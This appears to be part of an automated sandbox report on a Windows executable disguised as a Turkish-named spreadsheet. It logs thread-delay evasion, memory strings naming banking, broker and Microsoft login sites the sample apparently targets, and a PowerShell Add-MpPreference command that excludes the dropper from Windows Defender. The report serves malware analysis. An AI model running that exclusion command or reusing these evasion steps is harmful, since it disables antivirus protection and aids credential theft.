Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -598609s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -598390s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -598281s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -598171s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -598062s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -597952s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -597843s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -597625s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -597515s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -597394s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -597046s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -596499s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -596171s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -595952s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -595843s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -595624s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -595466s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -595343s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -595234s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -595124s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -595015s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -594796s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -594687s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -594578s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -594466s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599813	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599702	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599593	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599120	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598448	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598097	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597856	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597192	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595705	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599840
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599718
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599609
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599497
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599375
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599265
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599046
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598827
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598609
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598390
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598171
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597952
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597843
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597394
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597046
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596499
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596171
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595952
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595843
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595624
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595466
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595124
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594796
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594578
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594466

Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: xSjByRHuwGV.exe, 0000000F.00000002.3380774678.0000000001269000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3381720151.0000000001406000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: xSjByRHuwGV.exe, 0000000F.00000002.3392833347.00000000042FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Code function: 15_2_06D19548 LdrInitializeThunk,LdrInitializeThunk,

15_2_06D19548

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
